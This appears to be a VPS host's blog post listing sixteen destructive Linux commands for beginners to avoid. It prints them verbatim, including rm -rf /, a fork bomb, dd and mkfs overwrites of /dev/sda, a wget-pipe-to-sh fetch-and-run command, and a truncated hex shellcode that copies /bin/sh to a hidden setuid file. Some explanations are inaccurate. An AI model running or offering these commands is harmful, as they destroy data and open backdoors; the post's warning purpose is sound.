Dangerous and Destructive Linux Commands
05 March, 2023 by

16 Dangerous & Destructive Linux Commands You Should Avoid

Linux is an open-source and advanced operating system, that’s why it is very popular among users and developers. The Linux terminal provides features that users are deprived of using such features the graphical user interface. The ability to use the valuable features of the terminal and apply the changes you need by the command line is one of the reasons why the majority of users prefer working with the Linux terminal environment to the Linux graphical user interface when using the Linux system.

Users can implement their desired changes by executing Linux commands in the command line, and this feature of Linux is wonderful, but if they do not have enough expertise in coding, running some commands in Linux can be accompanied by many problems and irreparable vulnerabilities.

As we explained, the Linux command line interface is one of the strengths and advantages of Linux compared to other operating systems, which plays an important role in improving the management of the Linux operating system.

The possibility of beginner users falling into the pit of Linux command dangers is very high because they are not well familiar with Linux commands and at any moment there is a possibility of their system crashing by executing a malicious command. While we always recommend that you avoid executing any command without complete knowledge of Linux commands; Especially after buying a Linux VPS, be sure to familiarize yourself with Linux commands for better management of your Linux system.

Now you ask how can we learn comprehensive Linux commands. Don’t worry, just give us 5-10 minutes of your valuable time and get familiar with comprehensive Linux commands by reading our educational article. In order to avoid irreparable vulnerabilities, in this article we will introduce you to dangerous and destructive Linux commands so that you can avoid running these commands and stay away from the dangerous pit of Linux commands. This article is also helpful for professional users because it may remind you of a command that you were not aware of the dangers of.

If you are ready, carefully study and memorize the list of dangerous Linux commands that should not be executed.

1. Command > /dev/sda

Always remember that sending the output result of any command to the hard disk or partition carries risks such as erasing the data on the hard disk. If you are familiar with file systems, you know that /dev/sda is one of the disk drive partitions that stores file system data.

The> /dev/sdacommand in the sequence of any other command overwrites the output of the command in the /dev/sda block on your Linux system hard disk. This will cause the file system data in the /dev/sda block to be replaced with the output of the command and cause your system to crash and be damaged, and it will be impossible to recover.

The following commands are examples of running the /dev/sda command, which will overwrite your partition and have irreversible consequences. Consider the following examples:

cat file.txt > /dev/sda
wget http://iranserver.com > /dev/sda

ls -la / > /dev/sda

Note: In general, wrongly addressing the log file or using space in the log file name causes an error. For example, see the following command:

find / -iname "*.php" > /dev/sda1/  log.txt

By executing the above command, due to putting extra space between/at the end and log.txt, instead of saving the output of the command in the file /dev/sda1/log.txt, the output of the command is stored in the /dev/sda1 block. As a result of this mistake, the information of the sda1 drive is erased and its contents are replaced with other information.

2. rm -rf / Command

One of the commendable advantages of Linux is the ability to remove anything you want to get rid of. But don’t be fooled by Internet trolls into deleting files by executing any command because sometimes dangerous commands are presented to you that can erase the entire contents of your hard disk.

The rm command with different arguments enables the deletion of files and directories, so you must be very careful when running the rm command with different options so that an irreparable mistake does not occur. Running therm -rf /command with Root permission carries the risk of deleting all the files and directories of your system from the root (/) and as a result of this command, your system will suffer serious damage. This command is as follows:

rm -rf /

Some of the arguments that are executed along with the rm command to delete files are as follows:

  • -r: Recursive deletion in all subdirectories, even empty folders
  • -f: recursive deletion of files in directories and read-only files
  • -rf/: remove all directories and files in the main directory
  • -rf*: Recursively delete files in the root/current directory
  • -rf: remove all folders and subfolders

Note that if you do not have root user privileges, executing the rm-rf/ command does not carry the risk of erasing all files and directories and will not be a problem. Also, by executing the rm command, you should receive an error in deleting the file in certain circumstances, but there is no guarantee that you will receive an error before deleting the files and directories, so avoid running the rm -rf / command.

3. Chmod -R 777 / Command

As you know, Linux provides the possibility of collaboration of several users at the same time by using its capabilities that thechmodcommand offers the possibility of changing the permission of users to access certain files. The Chmod -R 777 / Command allows all users to read, write and execute in the main files such as configuration files, which results in serious security risks for the Linux system because all users can easily access the contents of the main files of the system and they can also make changes in them.

As a result, the way will be open for abuse by some users who have malicious intentions, which will not have favorable consequences. Therefore, avoid executing the following command:

chmod -R 777 /

It should be noted that by assigning permissions to all users, you may have problems booting the system, and some systems may encounter serious problems.

4. Fork Bomb command

The main syntax of the fork bomb command is as follows:

:(){ :|:& };:

See the command above. This strange script is a recursive command that will consume your system’s RAM and CPU after execution. This command keeps repeating itself in the background and foreground. Continuously performing this operation will cause your system to freeze up, because it destroys your system by consuming all the resources.

The fork bomb command is also called a rabbit or wabbit virus, which acts like a DOS attack. The way this command works is that the fork bomb command first creates a function named”:“, then it is executed by creating the contents of the function and sends the output to another function of itself, and then while the function is running in the foreground It is also executed in the background and by repeating this operation the system resources are consumed and the system is disrupted.

If you don’t want your system to freeze up, avoid running this command.

Limiting the number of running processes of local users is another solution to defend against the Rabbit virus attack. For example, to limit the number of processes performed by the local user to 6000, you can enter the following command:

ulimit -S -u 6000

Finally, the only way to save your Linux system from this danger will be a hardware reboot. So do not run the Fork Bomb command at all.

5. mkfs.ext3 /dev/sda Command

If you are not aware of the purpose of executing themkfscommand, it can become a dangerous command that deletes all the data stored on a partition. The mkfs command is executed to create a new file system on the specified device. Anything typed after mkfs will be formatted and replaced with an empty Linux file system.

Although there are advantages to formatting disk partitions, if the entire hard disk is formatted, such as /dev/sda, all data will be erased and the system cannot be restored. Themkfs.ext3 /dev/sdacommand will create the ext3 system file after formatting the entire hard disk, which will cause your system not to boot and you will encounter the “no bootable medium found? system halted” output. Therefore, to avoid harmful results, you should avoid the following commands:

# mkfs.ext3 /dev/sda
# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

6. mv folder /dev/null Command

Another precautionary method is to not move your directory or file to any file without knowledge. Any files moved to /dev/null, also known as “the black hole”, will be lost. Therefore, to protect your files when moving them to another file, do not execute themv folder /dev/nullcommand, because this command will move your file to the /dev/null file and then delete your main directory information.

7. > file command

The synonym of > file command is as follows:

cat /dev/null > file

redirecting in Linux systems has useful uses, but you should always be careful not to make a mistake when using redirection operators. Executing the >file command for redirecting the command to the file also leads to the deletion of the content of an important system file, which can produce undesirable results. In some situations, this command is used to clear the contents of a file, which facilitates the tasks of Linux system administrators, but in some situations, a mistake in using the redirection operators will have irreparable results.

Imagine that the contents of your configuration file will be deleted by a mistake and you will receive the file with a white screen, imagining this disaster is also terrible. Therefore, avoid running this command.

8. wget http://malicious_source -O- | sh command

To download files from the web through the command line environment, the Wget command is used. But running thewget http://malicious_source -O- | shcommand will select a malicious and untrusted source to download your file and execute it, thus infecting your system with a virus or malware. Therefore Do not use thewget http://malicious_source -O- | shcommand To download a file from the server or the web. When downloading the file, check the package address in the terminal to ensure that the download source is valid.

9. ^foo^bar Command

The^foo^barcommand is like a coin with two sides, one side is beneficial and the other side is risky. This command is very efficient in saving time to edit and re-execute previously executed commands, but few people know about the troubles of this command. Therefore, be careful when running the^foo^barcommand, because the smallest mistake in running this command Resulting in irreparable risks.

10. Hidden command

Hidden commands are one of the methods of executing commands in the terminal that are not published but can be executed on the router and are also coded based on the rm-rf command. These commands are executed for special purposes, which by hiding the code of the commands in hex form, cause users to be deceived, because you may not be able to recognize the threats by hiding the codes, and in the end, you will be faced with an unfavorable result. For example, consider the following command:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755

This command will lead to dangerous consequences such as erasing the root partition of your system. Therefore, running hidden commands is not recommended, because the identification and transparency of the codes you run and receive, free you from being caught in the trap of threats and dangers. Also, do not copy and execute commands from any unknown source, make sure the source is valid before executing commands.

11. dd command

One of the most powerful Linux commands is theddcommand, which has the potential to become a dangerous Linux command. Theddcommand is used to write data on physical drives and to transfer various files at a low level, if the dd command is not used correctly, it will destroy the contents of the hard drive. For example, the following commands can delete the contents of the /dev/sda block and replace unwanted data in the desired block:

dd if=/dev/random of=/dev/sda
dd if=/dev/zero of=/dev/sda
dd if=/dev/sda1 of=/dev/sda
dd if=/dev/urandom of=/dev/sdb

In the examples above, the statements in front of the “if” are the input of the command, and the statements in front of the “of “are the place where you want the output of the command to be moved. As you can see, the destination is the device’s hard drive (sda). In this way, all the contents of the hard drive will be deleted and the output of the command will replace them.

12. mv command

Themvcommand is used to move the contents of a directory or file to a specific location, which can be destructive when you move a directory to /dev/null by executing the mv command. As we mentioned before, /dev/null is a file that will destroy any data you transfer to it, so in this case the contents of a  file or directory will be deleted. The main syntax of the command is as follows:

mv directory /dev/null

It should be noted that /dev/null is not a directory but a file, so you cannot move the directory to that file using the mv command, but it is possible to move the file to /dev/null using the mv command. By transferring the file and rewriting the contents of the /dev/null file, you can convert the /dev/null file into a normal file, but you cannot get any output from it. As a result, the wrong configuration in system files can cause a system failure.

13. history | sh command

Another command that you should avoid is thehistory | shcommand.  history | sh command is an internal shell tool that provides a report of previously executed commands and allows users to re-execute commands from the displayed list without needing to type them. This command disrupts the system by unintentionally re-executing the commands you have already executed in the terminal environment.

14. crontab -r command

Using the crontab command, you can edit, index, send and delete cron jobs that are executed at regularly scheduled intervals by the cron daemon. In general, the crontab command automates many tasks and stores commands in a file. But if thecrontab -rcommand is run, it can delete the file that contains your basic information without sending a yes/no message. Therefore, be careful in running the crontab command so as not to experience irreparable consequences. We also suggest getting a backup copy of the crontab file regularly.

15. Using the “>” operator in the command

Usually, when writing to a specific file, the “>” operator is used in commands, so you should be careful when using the “>” operator. Because when using the “>” operator to write to the file, it can delete the data in the file and replaces the contents of the file with new data. The main syntax of the command that you should be careful when executing is as follows:

command > config_filename

As a result, if you overwrite an important configuration file and use this command to write data to the configuration file, your system may crash. Therefore, be careful in executing the “>” operator.

16.<em>command to overwrite Hard Drive

In addition to formatting the disk, which has its advantages, you can directly overwrite your hard disk with raw data, which is usually not recommended. For example, if the following command is used to overwrite the hard disk:

<em>command</em> > /dev/had

In the above command, the> Operator redirects the left command to the /dev /HAD file, which results in the redirection of raw data to use the data to rewrite the hard drive. It can be concluded that the performance of such commands is useless and it carries risks, so do not use such commands as much as possible.

Note: You can replace the <em> command with any Bash command.

FAQ

You can usermdirandrm -dcommands to permanently delete empty Linux files.

Conclusion

In this article, you got to know malicious and dangerous Linux commands, so do not execute these commands in Linux VPS or your Linux system in any way, which will have irreparable consequences. Our advice to you is, do not execute commands that you are not familiar with and do not use unknown and unreliable sources to compile or execute files. Also, before running Linux commands on a Linux VPS, you can use virtual machines to test Linux commands to avoid malicious damage to your Linux system.

Thank you for staying with us until the end of this article. if you have an unpleasant experience with using other Linux commands that are not mentioned in the list of this article, share them with us and other users in the comments section.

Leave a Reply

Your email address will not be published. Required fields are marked.